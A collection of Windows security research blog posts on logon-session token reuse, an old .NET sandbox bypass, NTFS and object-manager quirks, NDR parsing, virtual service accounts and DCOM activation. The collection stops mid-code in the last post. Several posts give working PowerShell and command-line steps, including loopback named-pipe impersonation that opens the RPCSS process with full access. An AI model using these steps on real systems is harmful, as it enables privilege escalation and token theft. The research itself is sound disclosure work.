The Logon Session on Windows is tied to an single authenticated user with a single Token. However, for service accounts that's not really true. Once you factor in Service Hardening there could be multiple different Tokens all identifying in the same logon session with different service groups etc. This blog post demonstrates a case where this sharing of the logon session with multiple different Tokens breaks Service Hardening isolation, at least for NETWORK SERVICE. Also don't forget S-1-1-0, this is NOT A SECURITY BOUNDARY. Lah lah, I can't hear you!

Let's get straight to it, when LSASS creates a Token for a new Logon session it stores that Token for later retrieval. For the most part this isn't that useful, however there is one case where the session Token is repurposed, network authentication. If you look at the prototype of AcquireCredentialsHandle where you specify the user to use for network authentication you'll notice a pvLogonID parameter. The explanatory note says:

"A pointer to a locally unique identifier (LUID) that identifies the user. This parameter is provided for file-system processes such as network redirectors. This parameter can be NULL."

What does this really mean? We'll if you have TCB privilege when doing network authentication this parameter specifies the Logon Session ID (or Authentication ID if you're coming from the Token's perspective) for the Token to use for the network authentication. Of course normally this isn't that interesting if the network authentication is going to another machine as the Token can't follow ('ish). However what about Local Loopback Authentication? In this case it does matter as it means that the negotiated Token on the server, which is the same machine, will actually be the session's Token, not the caller's Token.

Of course if you have TCB you can almost do whatever you like, why is this useful? The clue is back in the explanatory note, "... such as network redirectors". What's an easily accessible network redirector which supports local loopback authentication? SMB. Is there any primitives which SMB supports which allows you to get the network authentication token? Yes, Named Pipes. Will SMB do the network authentication in kernel mode and thus have effective TCB privilege? You betcha. To the PowerShellz!

Note, this is tested on Windows 10 1909, results might vary. First you'll need a PowerShell process running at NETWORK SERVICE. You can follow the instructions from my previous blog post on how to do that. Now with that shell we're running a vanilla NETWORK SERVICE process, nothing special. We do have SeImpersonatePrivilege though so we could probably run something like Rotten Potato, but we won't. Instead why not target the RPCSS service process, it also runs as NETWORK SERVICE and usually has loads of juicy Token handles we could steal to get to SYSTEM. There's of course a problem doing that, let's try and open the RPCSS service process.

PS> Get-RunningService "rpcss"
Name  Status  ProcessId
----  ------  ---------
rpcss Running 1152

PS> $p = Get-NtProcess -ProcessId 1152
Get-NtProcess : (0xC0000022) - {Access Denied}
A process has requested access to an object, but has not been granted those access rights.

Well, that puts an end to that. But wait, what Token would we get from a loop back authentication over SMB? Let's try it. First create a named pipe and start it listening for a new connection.

PS> $pipe = New-NtNamedPipeFile \\.\pipe\ABC -Win32Path
PS> $job = Start-Job { $pipe.Listen() }

Next open a handle to the pipe via localhost, and then wait for the job to complete.

PS> $file = Get-NtFile \\localhost\pipe\ABC -Win32Path
PS> Wait-Job $job | Out-Null

Finally open the RPCSS process again while impersonating the named pipe.

PS> $p = Use-NtObject($pipe.Impersonate()) { 
>>     Get-NtProcess -ProcessId 1152 
>>  }
PS> $p.GrantedAccess
AllAccess

How on earth does that work? Remember I said that the Token stored by LSASS is the first token created in that Logon Session? Well the first NETWORK SERVICE process is RPCSS, so the Token which gets saved is RPCSS's one. We can prove that by opening the impersonation token and looking at the group list.

PS> $token = Use-NtObject($pipe.Impersonate()) { 
>> Get-NtToken -Impersonation 
>> }
PS> $token.Groups | ? Name -Match Rpcss
Name             Attributes
----             ----------
NT SERVICE\RpcSs EnabledByDefault, Owner

Weird behavior, no? Of course this works for every logon session, though a normal user's session isn't quite so interesting. Also don't forget that if you access the admin shares as NETWORK SERVICE you'll actually be authenticated as the RPCSS service so any files it might have dropped with the Service SID would be accessible. Anyway, I'm sure others can come up with creative abuses of this.

Old .NET Vulnerability #5: Security Transparent Compiled Expressions (CVE-2013-0073)

It's been a long time since I wrote a blog post about my old .NET vulnerabilities. I was playing around with some .NET code and found an issue when serializing delegates inside a CAS sandbox, I got a SerializationException thrown with the following text:

Cannot serialize delegates over unmanaged function pointers, 
dynamic methods or methods outside the delegate creator's assembly.
   
I couldn't remember if this has always been there or if it was new. I reached out on Twitter to my trusted friend on these matters, @blowdart, who quickly fobbed me off to Levi. But the take away is at some point the behavior of Delegate serialization was changed as part of a more general change to add Secure Delegates.

It was then I realized, that it's almost certainly (mostly) my fault that the .NET Framework has this feature and I dug out one of the bugs which caused it to be the way it is. Let's have a quick overview of what the Secure Delegate is trying to prevent and then look at the original bug.

.NET Code Access Security (CAS) as I've mentioned before when discussing my .NET PAC vulnerability allows a .NET "sandbox" to restrict untrusted code to a specific set of permissions. When a permission demand is requested the CLR will walk the calling stack and check the Assembly Grant Set for every Stack Frame. If there is any code on the Stack which doesn't have the required Permission Grants then the Stack Walk stops and a SecurityException is generated which blocks the function from continuing. I've shown this in the following diagram, some untrusted code tries to open a file but is blocked by a Demand for FileIOPermission as the Stack Walk sees the untrusted Code and stops.

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Caller stack frame.

What has this to do with delegates? A problem occurs if an attacker can find some code which will invoke a delegate under asserted permissions. For example, in the previous diagram there was an Assert at the bottom of the stack, but the Stack Walk fails early when it hits the Untrusted Caller Frame.

However, as long as we have a delegate call, and the function the delegate calls is Trusted then we can put it into the chain and successfully get the privileged operation to happen.

View of a stack walk in .NET allowed due to replacing untrusted call frame with a delegate.

The problem with this technique is finding a trusted function we can wrap in a delegate which you can attach to something such a Windows Forms event handler, which might have the prototype:
void Callback(object obj, EventArgs e)

and would call the File.OpenRead function which has the prototype:

FileStream OpenRead(string path).

That's a pretty tricky thing to find. If you know C# you'll know about Lambda functions, could we use something like?

EventHandler f = (o,e) => File.OpenRead(@"C:\SomePath")

Unfortunately not, the C# compiler takes the lambda, generates an automatic class with that function prototype in your own assembly. Therefore the call to adapt the arguments will go through an Untrusted function and it'll fail the Stack Walk. It looks something like the following in CIL:

Turns out there's another way. See if you can spot the difference here.

Expression lambda = (o,e) => File.OpenRead(@"C:\SomePath")
EventHandle f = lambda.Compile()

We're still using a lambda, surely nothing has changed? We'll let's look at the CIL.

That's just crazy. What's happened? The key is the use of Expression. When the C# compiler sees that type it decides rather than create a delegate in your assembly it'll creation something called an expression tree. That tree is then compiled into the final delegate. The important thing for the vulnerability I reported is this delegate was trusted as it was built using the AssemblyBuilder functionality which takes the Permission Grant Set from the calling Assembly. As the calling Assembly is the Framework code it got full trust. It wasn't trusted to Assert permissions (a Security Transparent function), but it also wouldn't block the Stack Walk either. This allows us to implement any arbitrary Delegate adapter to convert one Delegate call-site into calling any other API as long as you can do that under an Asserted permission set.

View of a stack walk in .NET allowed due to replacing untrusted call frame with a expression generated delegate.

I was able to find a number of places in WinForms which invoked Event Handlers while asserting permissions that I could exploit. The initial fix was to fix those call-sites, but the real fix came later, the aforementioned Secure Delegates.

Silverlight always had Secure delegates, it would capture the current CAS Permission set on the stack when creating them and add a trampoline if needed to the delegate to insert an Untrusted Stack Frame into the call. Seems this was later added to .NET. The reason that Serializing is blocked is because when the Delegate gets serialized this trampoline gets lost and so there's a risk of it being used to exploit something to escape the sandbox. Of course CAS is dead anyway.

The end result looks like the following:

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Trampoline Stack Frame.

Anyway, these are the kinds of design decisions that were never full scoped from a security perspective. They're not unique to .NET, or Java, or anything else which runs arbitrary code in a "sandboxed" context including things JavaScript engines such as V8 or JSCore.


Writing Windows File System Drivers is Hard.

A tweet by @jonasLyk reminded me of a bug I found in NTFS a few months back, which I've verified still exists in Windows 10 2004. As far as I can tell it's not directly usable to circumvent security but it feels like a bug which could be used in a chain. NTFS is a good demonstration of how complex writing a FS driver is on Windows, so it's hardly surprising that so many weird edges cases pop up over time.

The issue in this case was related to the default Security Descriptor (SD) assignment when creating a new Directory. If you understand anything about Windows SDs you'll know it's possible to specify the inheritance rules through either the CONTAINER_INHERIT_ACE and/or OBJECT_INHERIT_ACE ACE flags. These flags represent whether the ACE should be inherited from a parent directory if the new entry is either a Directory or a File. Let's look at the code which NTFS uses to assign security to a new file and see if you can spot the bug?

The code uses SeAssignSecurityEx to create the new SD based on the Parent SD and any explicit SD from the caller. For inheritance to work you can't specify an explicit SD, so we can ignore that. Whether SeAssignSecurityEx applies the inheritance rules for a Directory or a File depends on the value of the IsDirectoryObject parameter. This is set to TRUE if the FILE_DIRECTORY_FILE options flag was passed to NtCreateFile. That seems fine, you can't create a Directory if you don't specify the FILE_DIRECTORY_FILE flag, if you don't specify a flag then a File will be created by default.

But wait, that's not true at all. If you specify a name of the form ABC::$INDEX_ALLOCATION then NTFS will create a Directory no matter what flags you specify. Therefore the bug is, if you create a directory using the $INDEX_ALLOCATION trick then the new SD will inherit as if it was a File rather than a Directory. We can verifying this behavior on the command prompt.

C:\> mkdir ABC
C:\> icacls ABC /grant "INTERACTIVE":(CI)(IO)(F)
C:\> icacls ABC /grant "NETWORK":(OI)(IO)(F)

First we create a directory ABC and grant two ACEs, one for the INTERACTIVE group will inherit on a Directory, the other for NETWORK will inherit on a File.

C:\> echo "Hello" > ABC\XYZ::$INDEX_ALLOCATION
Incorrect function.

We then create the sub-directory XYZ using the $INDEX_ALLOCATION trick. We can be sure it worked as CMD prints "Incorrect function" when it tries to write "Hello" to the directory object.

C:\> icacls ABC\XYZ
ABC\XYZ NT AUTHORITY\NETWORK:(I)(F)
        NT AUTHORITY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)

Dumping the SD for the XYZ sub-directory we see the ACEs were inherited based on it being a File, rather than a Directory as we can see an ACE for NETWORK rather than for INTERACTIVE. Finally we list ABC to verify it really is a directory.

C:\> dir ABC
 Volume in drive C has no label.
 Volume Serial Number is 9A7B-865C

 Directory of C:\ABC

2020-05-20  19:09    <DIR>          .
2020-05-20  19:09    <DIR>          ..
2020-05-20  19:05    <DIR>          XYZ


Is this useful? Honestly probably not. The only scenario I could imagine it would be is if you can specify a path to a system service which creates a file in a location where inherited File access would grant access and inherited Directory access would not. This would allow you to create a Directory you can control, but it seems a bit of a stretch to be honest. If anyone can think of a good use for this let me or Microsoft know :-)

Still, it's interesting that this is another case where $INDEX_ALLOCATION isn't correctly verified where determining whether an object is a Directory or a File. Another good example was CVE-2018-1036, where you could create a new Directory with only FILE_ADD_FILE permission. Quite why this design decision was made to automatically create a Directory when using the stream type is unclear. I guess we might never know.


Silent Exploit Mitigations for the 1%

With the accelerated release schedule of Windows 10 it's common for new features to be regularly introduced. This is especially true of features to mitigate some poorly designed APIs or easily misused behavior. The problems with many of these mitigations is they're regularly undocumented or at least not exposed through the common Win32 APIs. This means that while Microsoft can be happy and prevent their own code from being vulnerable they leave third party developers to get fucked.

One example of these silent mitigations are the additional OBJECT_ATTRIBUTE flags OBJ_IGNORE_IMPERSONATED_DEVICEMAP and OBJ_DONT_REPARSE which were finally documented, in part because I said it'd be nice if they did so. Of course, it only took 5 years to document them since they were introduced to fix bugs I reported. I guess that's pretty speedy in Microsoft's world. And of course they only help you if you're using the system call APIs which, let's not forget, are only partially documented.

While digging around in Windows 10 2004 (ugh... really, it's just confusing), and probably reminded by Alex Ionescu at some point, I noticed Microsoft have introduced another mitigation which is only available using an undocumented system call and not via any exposed Win32 API. So I thought, I should document it.

UPDATE (2020-04-23): According to @FireF0X this was backported to all supported OS's. So it's a security fix important enough to backport but not tell anyone about. Fantastic.

The system call in question is NtLoadKey3. According to j00ru's system call table this was introduced in Windows 10 2004, however it's at least in Windows 10 1909 as well. As the name suggests (if you're me at least) this loads a Registry Key Hive to an attachment point. This functionality has been extended over time, originally there was only NtLoadKey, then NtLoadKey2 was introduced in XP I believe to add some flags. Then NtLoadKeyEx was introduced to add things like explicit Trusted Hive support to mitigate cross hive symbolic link attacks (which is all j00ru's and Gynvael fault). And now finally NtLoadKey3. I've no idea why it went to 2 then to Ex then back to 3 maybe it's some new Microsoft counting system. The NtLoadKeyEx is partially exposed through the Win32 APIs RegLoadKey and RegLoadAppKey APIs, although they're only expose a subset of the system call's functionality.

Okay, so what bug class is NtLoadKey3 trying to mitigate? One of the problematic behaviors of loading a full Registry Hive (rather that a Per-User Application Hive) is you need to have SeRestorePrivilege* on the caller's Effective Token. SeRestorePrivilege is only granted to Administrators, so in order to call the API successfully you can't be impersonating a low-privileged user. However, the API can also create files when loading the hive file. This includes the hive file itself as well as the recovery log files.

* Don't pay attention to the documentation for RegLoadKey which claims you also need SeBackupPrivilege. Maybe it was required at some point, but it isn't any more.

When loading a system hive such as HKLM\SOFTWARE this isn't an issue as these hives are stored in an Administrator only location (c:\windows\system32\config if you're curious) but sometimes the hives are loaded from user-accessible locations such as from the user's profile or for Desktop Bridge support. In a user accessible location you can use symbolic link tricks to force the logs file to be written to arbitrary locations, and to make matters worse the Security Descriptor of the primary hive file is copied to the log file so it'll be accessible afterwards. An example of just this bug, in this case in Desktop Bridge, is issue 1492 (and 1554 as they didn't fix it properly (╯°□°)╯︵ ┻━┻).

RegLoadKey3 fixes this by introducing an additional parameter to specify an Access Token which will be impersonated when creating any files. This way the check for SeRestorePrivilege can use the caller's Access Token, but any "dangerous" operation will use the user's Token. Of course they could have probably implemented this by adding a new flag which will check the caller's Primary Token for the privilege like they do for SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege but what do I know...

Used appropriately this should completely mitigate the poor design of the system call. For example the User Profile service now uses NtLoadKey3 when loading the hives from the user's profile. How do you call it yourself? I couldn't find any documentation obviously, and even in the usual locations such as OLE32's private symbols there doesn't seem to be any structure data, so I made best guess with the following:

Notice that the TrustKey and Event handles from NtLoadKeyEx have also been folded up into a list of handle values. Perhaps someone wasn't sure if they ever needed to extend the system call whether to go for NtLoadKey4 or NtLoadKeyExEx so they avoided the decision by making the system call more flexible. Also the final parameter, which is also present in NtLoadKeyEx is seemingly unused, or I'm just incapable of tracking down when it gets referenced. Process Hacker's header files claim it's for an IO_STATUS_BLOCK pointer, but I've seen no evidence that's the case.

It'd be really awesome if in this new, sharing and caring Microsoft that they, well shared and cared more often, especially for features important to securing third party applications. TBH I think they're more focused on bringing Wayland to WSL2 or shoving a new API set down developers' throats than documenting things like this.

OBJ_DONT_REPARSE is (mostly) Useless.

Continuing a theme from the last blog post, I think it's great that the two additional OBJECT_ATTRIBUTE flags were documented as a way of mitigating symbolic link attacks. While OBJ_IGNORE_IMPERSONATED_DEVICEMAP is pretty useful, the other flag, OBJ_DONT_REPARSE isn't, at least not for protecting file system access.

To quote the documentation, OBJ_DONT_REPARSE does the following:

"If this flag is set, no reparse points will be followed when parsing the name of the associated object. If any reparses are encountered the attempt will fail and return an STATUS_REPARSE_POINT_ENCOUNTERED result. This can be used to determine if there are any reparse points in the object's path, in security scenarios."

This seems pretty categorical, if any reparse point is encountered then the name parsing stops and STATUS_REPARSE_POINT_ENCOUNTERED is returned. Let's try it out in PS and open the notepad executable file.

PS> Get-NtFile \??\c:\windows\notepad.exe -ObjectAttributes DontReparse
Get-NtFile : (0xC000050B) - The object manager encountered a reparse point while retrieving an object.

Well that's not what you might expect, there should be no reparse points to access notepad, so what went wrong? We'll you're assuming that the documentation meant NTFS reparse points, when it really meant all reparse points. The C: drive symbolic link is still a reparse point, just for the Object Manager. Therefore just accessing a drive path using this Object Attribute flag fails. Still this does means that it will also work to protect you from Registry Symbolic Links as well as that also uses a Reparse Point.

I'm assuming this flag wasn't introduced for file access at all, but instead for named kernel objects where encountering a Symbolic Link is usually less of a problem. Unlike OBJ_IGNORE_IMPERSONATED_DEVICEMAP I can't pinpoint a specific vulnerability this flag was associated with, so I can't say for certain why it was introduced. Still, it's slightly annoying especially considering there is an IO Manager specific flag, IO_STOP_ON_SYMLINK which does what you'd want to avoid file system symbolic links but that can only be accessed in kernel mode with IoCreateFileEx.

Not that this flag completely protects against Object Manager redirection attacks. It doesn't prevent abuse of shadow directories for example which can be used to redirect path lookups.

PS> $d = Get-NtDirectory \Device
PS> $x = New-NtDirectory \BaseNamedObjects\ABC -ShadowDirectory $d
PS> $f = Get-NtFile \BaseNamedObjects\ABC\HarddiskVolume3\windows\notepad.exe -ObjectAttributes DontReparse
PS> $f.FullPath
\Device\HarddiskVolume3\Windows\notepad.exe

Oh well...

Generating NDR Type Serializers for C#

As part of updating NtApiDotNet to v1.1.28 I added support for Kerberos authentication tokens. To support this I needed to write the parsing code for Tickets. The majority of the Kerberos protocol uses ASN.1 encoding, however some Microsoft specific parts such as the Privileged Attribute Certificate (PAC) uses Network Data Representation (NDR). This is due to these parts of the protocol being derived from the older NetLogon protocol which uses MSRPC, which in turn uses NDR.

I needed to implement code to parse the NDR stream and return the structured information. As I already had a class to handle NDR I could manually write the C# parser but that'd take some time and it'd have to be carefully written to handle all use cases. It'd be much easier if I could just use my existing NDR byte code parser to extract the structure information from the KERBEROS DLL. I'd fortunately already written the feature, but it can be non-obvious how to use it. Therefore this blog post gives you an overview of how to extract NDR structure data from existing DLLs and create standalone C# type serializer.

First up, how does KERBEROS parse the NDR structure? It could have manual implementations, but it turns out that one of the lesser known features of the MSRPC runtime on Windows is its ability to generate standalone structure and procedure serializers without needing to use an RPC channel. In the documentation this is referred to as Serialization Services.

To implement a Type Serializer you need to do the following in a C/C++ project. First, add the types to serialize inside an IDL file. For example the following defines a simple type to serialize.

interface TypeEncoders
{
    typedef struct _TEST_TYPE
    {
        [unique, string] wchar_t* Name;
        DWORD Value;
    } TEST_TYPE;
}

You then need to create a separate ACF file with the same name as the IDL file (i.e. if you have TYPES.IDL create a file TYPES.ACF) and add the encode and decode attributes.

interface TypeEncoders
{
    typedef [encode, decode] TEST_TYPE;
}

Compiling the IDL file using MIDL you'll get the client source code (such as TYPES_c.c), and you should find a few functions, the most important being TEST_TYPE_Encode and TEST_TYPE_Decode which serialize (encode) and deserialize (decode) a type from a byte stream. How you use these functions is not really important. We're more interested in understanding how the NDR byte code is configured to perform the serialization so that we can parse it and generate our own serializers. 

If you look at the Decode function when compiled for a X64 target it should look like the following:

void
TEST_TYPE_Decode(
    handle_t _MidlEsHandle,
    TEST_TYPE * _pType)
{
    NdrMesTypeDecode3(
         _MidlEsHandle,
         ( PMIDL_TYPE_PICKLING_INFO  )&__MIDL_TypePicklingInfo,
         &TypeEncoders_ProxyInfo,
         TypePicklingOffsetTable,
         0,
         _pType);
}

The NdrMesTypeDecode3 is an API implemented in the RPC runtime DLL. You might be shocked to hear this, but this function and its corresponding NdrMesTypeEncode3 are not documented in MSDN. However, the SDK headers contain enough information to understand how it works.

The API takes 6 parameters:
  1. The serialization handle, used to maintain state such as the current stream position and can be used multiple times to encode or decode more that one structure in a stream.
  2. The MIDL_TYPE_PICKLING_INFO structure. This structure provides some basic information such as the NDR engine flags.
  3. The MIDL_STUBLESS_PROXY_INFO structure. This contains the format strings and transfer types for both DCE and NDR64 syntax encodings.
  4. A list of type offset arrays, these contains the byte offset into the format string (from the Proxy Info structure) for all type serializers.
  5. The index of the type offset in the 4th parameter.
  6. A pointer to the structure to serialize or deserialize.

Only parameters 2 through 5 are needed to parse the NDR byte code correctly. Note that the NdrMesType*3 APIs are used for dual DCE and NDR64 serializers. If you compile as 32 bit it will instead use NdrMesType*2 APIs which only support DCE. I'll mention what you need to parse the DCE only APIs later, but for now most things you'll want to extract are going to have a 64 bit build which will almost always use NdrMesType*3 even though my tooling only parses the DCE NDR byte code.

To parse the type serializers you need to load the DLL you want to extract from into memory using LoadLibrary (to ensure any relocations are processed) then use either the Get-NdrComplexType PS command or the NdrParser::ReadPicklingComplexType method and pass the addresses of the 4 parameters.

Let's look at an example in KERBEROS.DLL. We'll pick the PAC_DEVICE_INFO structure as it's pretty complex and would require a lot of work to manually write a parser. If you disassemble the PAC_DecodeDeviceInfo function you'll see the call to NdrMesTypeDecode3 as follows (from the DLL in Windows 10 2004 SHA1:173767EDD6027F2E1C2BF5CFB97261D2C6A95969).

mov     [rsp+28h], r14  ; pObject
mov     dword ptr [rsp+20h], 5 ; nTypeIndex
lea     r9, off_1800F3138 ; ArrTypeOffset
lea     r8, stru_1800D5EA0 ; pProxyInfo
lea     rdx, stru_1800DEAF0 ; pPicklingInfo
mov     rcx, [rsp+68h]  ; Handle
call    NdrMesTypeDecode3

From this we can extract the following values:

MIDL_TYPE_PICKLING_INFO = 0x1800DEAF0
MIDL_STUBLESS_PROXY_INFO = 0x1800D5EA0
Type Offset Array = 0x1800F3138
Type Offset Index = 5

These addresses are using the default load address of the library which is unlikely to be the same as where the DLL is loaded in memory. Get-NdrComplexType supports specifying relative addresses from a base module, so subtract the base address of 0x180000000 before using them. The following script will extract the type information.

PS> $lib = Import-Win32Module KERBEROS.DLL
PS> $types = Get-NdrComplexType -PicklingInfo 0xDEAF0 -StublessProxy 0xD5EA0 `
     -OffsetTable 0xF3138 -TypeIndex 5 -Module $lib

As long as there was no error from this command the $types variable will now contain the parsed complex types, in this case there'll be more than one. Now you can format them to a C# source code file to use in your application using Format-RpcComplexType.

PS> Format-RpcComplexType $types -Pointer

This will generate a C# file which looks like this. The code contains Encoder and Decoder classes with static methods for each structure. We also passed the Pointer parameter to Format-RpcComplexType. This is so that the structured are wrapped inside a Unique Pointers. This is the default when using the real RPC runtime, although except for Conformant Structures isn't strictly necessary. If you don't do this then the decode will typically fail, certainly in this case.

You might notice a serious issue with the generated code, there are no proper structure names. This is unavoidable, the MIDL compiler doesn't keep any name information with the NDR byte code, only the structure information. However, the basic Visual Studio refactoring tool can make short work of renaming things if you know what the names are supposed to be. You could also manually rename everything in the parsed structure information before using Format-RpcComplexType.

In this case there is an alternative to all that. We can use the fact that the official MS documentation contains a full IDL for PAC_DEVICE_INFO and its related structures and build our own executable with the NDR byte code to extract. How does this help? If you reference the PAC_DEVICE_INFO structure as part of an RPC interface no only can you avoid having to work out the offsets as Get-RpcServer will automatically find the location you can also use an additional feature to extract the type information from your private symbols to fixup the type information.

Create a C++ project and in an IDL file copy the PAC_DEVICE_INFO structures from the protocol documentation. Then add the following RPC server.

[
    uuid(4870536E-23FA-4CD5-9637-3F1A1699D3DC),
    version(1.0),
]
interface RpcServer
{
    int Test([in] handle_t hBinding, 
             [unique] PPAC_DEVICE_INFO device_info);
}

Add the generated server C code to the project and add the following code somewhere to provide a basic implementation:

#pragma comment(lib, "rpcrt4.lib")

extern "C" void* __RPC_USER MIDL_user_allocate(size_t size) {
    return new char[size];
}

extern "C" void __RPC_USER MIDL_user_free(void* p) {
    delete[] p;
}

int Test(
    handle_t hBinding,
    PPAC_DEVICE_INFO device_info) {
    printf("Test %p\n", device_info);
    return 0;
}

Now compile the executable as a 64-bit release build if you're using 64-bit PS. The release build ensures there's no weird debug stub in front of your function which could confuse the type information. The implementation of Test needs to be unique, otherwise the linker will fold a duplicate function and the type information will be lost, we just printf a unique string.

Now parse the RPC server using Get-RpcServer and format the complex types.

PS> $rpc = Get-RpcServer RpcServer.exe -ResolveStructureNames
PS> Format-RpcComplexType $rpc.ComplexTypes -Pointer

If everything has worked you'll now find the output to be much more useful. Admittedly I also did a bit of further cleanup in my version in NtApiDotNet as I didn't need the encoders and I added some helper functions.

Before leaving this topic I should point out how to handle called to NdrMesType*2 in case you need to extract data from a library which uses that API. The parameters are slightly different to NdrMesType*3.

void
TEST_TYPE_Decode(
    handle_t _MidlEsHandle,
    TEST_TYPE * _pType)
{
    NdrMesTypeDecode2(
         _MidlEsHandle,
         ( PMIDL_TYPE_PICKLING_INFO  )&__MIDL_TypePicklingInfo,
         &TypeEncoders_StubDesc,
         ( PFORMAT_STRING  )&types__MIDL_TypeFormatString.Format[2],
         _pType);
}
  1. The serialization handle.
  2. The MIDL_TYPE_PICKLING_INFO structure.
  3. The MIDL_STUB_DESC structure. This only contains DCE NDR byte code.
  4. A pointer into the format string for the start of the type.
  5. A pointer to the structure to serialize or deserialize.
Again we can discard the first and last parameters. You can then get the addresses of the middle three and pass them to Get-NdrComplexType.

PS> Get-NdrComplexType -PicklingInfo 0x1234 `
    -StubDesc 0x2345 -TypeFormat 0x3456 -Module $lib

You'll notice that there's a offset in the format string (2 in this case) which you can pass instead of the address in memory. It depends what information your disassembler shows:

PS> Get-NdrComplexType -PicklingInfo 0x1234 `
    -StubDesc 0x2345 -TypeOffset 2 -Module $lib

Hopefully this is useful for implementing these NDR serializers in C#. As they don't rely on any native code (or the RPC runtime) you should be able to use them on other platforms in .NET Core even if you can't use the ALPC RPC code.

Using LsaManageSidNameMapping to add a name to a SID.

I was digging into exactly how service SIDs are mapped back to a name when I came across the API LsaLookupManageSidNameMapping. Unsurprisingly this API is not officially documented either on MSDN or in the Windows SDK. However, LsaManageSidNameMapping is documented (mostly). Turns out that after a little digging they lead to the same RPC function in LSASS, just through different names:

LsaLookupManageSidNameMapping -> lsass!LsaLookuprManageCache

and

LsaManageSidNameMapping -> lsasrv!LsarManageSidNameMapping

They ultimately both end up in lsasrv!LsarManageSidNameMapping. I've no idea why there's two of them and why one is documented but the other not. *shrug*. Of course even though there's an MSDN entry for the function it doesn't seem to actually be documented in the Ntsecapi.h include file *double shrug*. Best documentation I found was this header file.

This got me wondering if I could map all the AppContainer named capabilities via LSASS so that normal applications would resolve them rather than having to do it myself. This would be easier than modifying the SAM or similar tricks. Sadly while you can add some SID to name mappings this API won't let you do that for capability SIDs as there are the following calling restrictions:

  1. The caller needs SeTcbPrivilege (this is a given with an LSA API).
  2. The SID to map must be in the NT security authority (5) and the domain's first RID must be between 80 and 111 inclusive.
  3. You must register a domain SID's name first to use the SID which includes it.
Basically 2 stops us adding a sub-domain SID for a capability as they use the package security authority (15) and we can't just go straight to added the SID to name as we need to have registered the domain with the API, it's not enough that the domain exists. Maybe there's some other easy way to do it, but this isn't it.

Instead I've just put together a .NET tool to add or remove your own SID to name mappings. It's up on github. The mappings are ephemeral so if you break something rebooting should fix it :-)


Creating your own Virtual Service Accounts

Following on from the previous blog post, if you can't map arbitrary SIDs to names to make displaying capabilities nicer what is the purpose of LsaManageSidNameMapping? The primary purpose is to facilitate the creation of Virtual Service Accounts

A virtual service account allows you to create an access token where the user SID is a service SID, for example, NT SERVICE\TrustedInstaller. A virtual service account doesn't need to have a password configured which makes them ideal for restricting services rather than having to deal with the default service accounts and using WSH to lock them down or specifying a domain user with password.

To create an access token for a virtual service account you can use LogonUserExEx and specify the undocumented (AFAIK) LOGON32_PROVIDER_VIRTUAL logon provider. You must have SeTcbPrivilege to create the token, and the SID of the account must have its first RID in the range 80 to 111 inclusive. Recall from the previous blog post this is exactly the same range that is covered by LsaManageSidNameMapping.

The LogonUserExEx API only takes strings for the domain and username, you can't specify a SID. Using the LsaManageSidNameMapping function allows you to map a username and domain to a virtual service account SID. LSASS prevents you from using RID 80 (NT SERVICE) and 87 (NT TASK) outside of the SCM or the task scheduler service (see this snippet of reversed LSASS code for how it checks). However everything else in the RID range is fair game.

So let's create out own virtual service account. First you need to add your domain and username using the tool from the previous blog post. All these commands need to be run as a user with SeTcbPrivilege.

SetSidMapping.exe S-1-5-100="AWESOME DOMAIN" 
SetSidMapping.exe S-1-5-100-1="AWESOME DOMAIN\USER"

So we now have the AWESOME DOMAIN\USER account with the SID S-1-5-100-1. Now before we can login the account you need to grant it a logon right. This is normally SeServiceLogonRight if you wanted a service account, but you can specify any logon right you like, even SeInteractiveLogonRight (sadly I don't believe you can actually login with your virtual account, at least easily).

If you get the latest version of NtObjectManager (from github at the time of writing) you can use the Add-NtAccountRight command to add the logon type.

PS> Add-NtAccountRight -Sid 'S-1-5-100-1' -LogonType SeInteractiveLogonRight

Once granted a logon right you can use the Get-NtToken command to logon the account and return a token.

PS> $token = Get-NtToken -Logon -LogonType Interactive -User USER -Domain 'AWESOME DOMAIN' -LogonProvider Virtual
PS> Format-NtToken $token
AWESOME DOMAIN\USER

As you can see we've authenticated the virtual account and got back a token. As we chose to logon as an interactive type the token will also have the INTERACTIVE group assigned. Anyway that's all for now. I guess as there's only a limited number of RIDs available (which is an artificial restriction) MS don't want document these features even though it could be a useful thing for normal developers.



Standard Activating Yourself to Greatness

This week @decoder_it and @splinter_code disclosed a new way of abusing DCOM/RPC NTLM relay attacks to access remote servers. This relied on the fact that if you're in logged in as a user on session 0 (such as through PowerShell remoting) and you call CoGetInstanceFromIStorage the DCOM activator would create the object on the lowest interactive session rather than the session 0. Once an object is created the initial unmarshal of the IStorage object would happen in the context of the user authenticated to that session. If that happens to be a privileged user such as a Domain Administrator then the NTLM authentication could be relayed to a remote server and fun ensues.

The obvious problem with this attack is the requirement of being in session 0. Certainly it's possible a non-admin user might be allowed to authenticate to a system via PowerShell remoting but it'd be rarer than just being authenticated on a Terminal Server with multiple other users you could attack. It'd be nice if somehow you could pick the session that the object was created on.

Of course this already exists, you can use the session moniker to activate an object cross-session (other than to session 0 which is special). I've abused this feature multiple times for cross-session attacks, such as this, this or this. I've repeated told Microsoft they need to fix this activation route as it makes no sense than a non-administrator can do it. But my warnings have not been heeded. 

If you read the description of the session moniker you might notice a problem for us, it can't be combined with IStorage activation. The COM APIs only give us one or the other. However, if you poke around at the DCOM protocol documentation you'll notice that they are technically independent. The session activation is specified by setting the dwSessionId field in the SpecialPropertiesData activation property. And the marshalled IStorage object can be passed in the ifdStg field of the InstanceInfoData activation property. You package those activation properties up and send them to the IRemoteSCMActivator RemoteGetClassObject or RemoteCreateInstance methods. Of course it's possible this won't really work, but at least they are independent properties and could be mixed.

The problem with testing this out is implementing DCOM activation is ugly. The activation properties first need to be NDR marshalled in a blob. They then need to be packaged up correctly before it can be sent to the activator. Also the documentation is only for remote activation which is not we want, and there are some weird quirks of local activation I'm not going to go into. Is there any documented way to access the activator without doing all this?

No, sorry. There is an undocumented way though if you're interested? Sure? Okay good, let's carry on. The key with these sorts of challenges is to just look at how the system already does it. Specifically we can look at how session moniker is activating the object and maybe from that we'll be lucky and we can reuse that for our own purposes.

Where to start? If you read this MSDN article you can see you need to call MkParseDisplayNameEx to create parse the string into a moniker. But that's really a wrapper over MkParseDisplayName to provide URL moniker functionality which we don't care about. We'll just start at the MkParseDisplayName which is in OLE32.

HRESULT MkParseDisplayName(LPBC pbc, LPCOLESTR szUserName, 
      ULONG *pchEaten, LPMONIKER *ppmk) {
